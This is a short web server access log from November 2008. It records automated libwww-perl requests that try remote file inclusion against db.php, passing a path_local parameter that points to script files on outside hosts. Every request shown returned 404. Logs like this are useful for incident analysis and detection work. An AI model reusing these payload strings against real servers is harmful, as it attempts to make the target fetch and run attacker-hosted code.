66.40.52.30 - - [03/Nov/2008:06:15:48 -0600] "GET /logs/access_log.1208217600//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:15:48 -0600] "GET /logs//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:15:48 -0600] "GET //db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.800"
89.218.85.18 - - [03/Nov/2008:06:16:19 -0600] "GET /logs/access_log.1208217600//db.php?path_local=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:16:22 -0600] "GET //db.php?path_local=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
